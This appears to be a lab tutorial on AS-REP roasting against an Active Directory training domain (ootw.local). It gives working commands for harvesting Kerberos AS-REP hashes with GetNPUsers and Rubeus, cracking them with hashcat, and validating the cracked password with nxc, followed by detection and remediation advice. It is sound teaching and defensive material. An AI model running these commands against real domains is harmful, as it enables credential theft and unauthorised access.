ASREP roasting requests crackable Kerberos material for accounts that do not require preauthentication.
This belongs in initial access because it can work without a valid password.
Why It Works
Normal Kerberos authentication requires the client to prove knowledge of the password before the KDC returns useful encrypted material.
If an account has Do not require Kerberos preauthentication enabled, the KDC can return an AS-REP directly. Part of that response is encrypted with the user's password-derived key, so we can crack it offline.
Enumerate With GetNPUsers
Prepare users:
cat > users.txt <<'EOF'
alice.wright
ben.carter
svc_legacy
svc_sql
svc_web
EOF
Request AS-REP hashes:
GetNPUsers.py ootw.local/ -usersfile users.txt -dc-ip 10.10.10.200 -no-pass -format hashcat -outputfile asrep.hashes
Expected OOTW vulnerable account:
svc_legacy
Crack
Hashcat mode:
18200
Crack:
hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt
hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt --show
Controlled OOTW wordlist:
printf 'Legacy2026!\nStudentPass2026!\nHelpdesk2026!\n' > ootw-small.txt
hashcat -m 18200 asrep.hashes ootw-small.txt
hashcat -m 18200 asrep.hashes ootw-small.txt --show
Validate
nxc smb 10.10.10.200 -d ootw.local -u svc_legacy -p 'Legacy2026!'
nxc ldap 10.10.10.200 -d ootw.local -u svc_legacy -p 'Legacy2026!'
Success:
[+] ootw.local\svc_legacy:Legacy2026!
Windows Option
From a domain-joined Windows host:
.\Rubeus.exe asreproast /user:svc_legacy /format:hashcat /nowrap
All visible vulnerable users:
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt
Detection
Defenders look for:
- Security 4768 where preauthentication type is 0
- bursts of AS-REQ traffic across many users
- Rubeus or Impacket execution
- successful logons after ASREP collection
- accounts configured with preauthentication disabled
Remediation
- disable
Do not require Kerberos preauthentication - enforce strong passwords on service accounts
- rotate exposed service account passwords
- monitor 4768 events for preauth-disabled accounts
- avoid using normal user accounts as long-lived services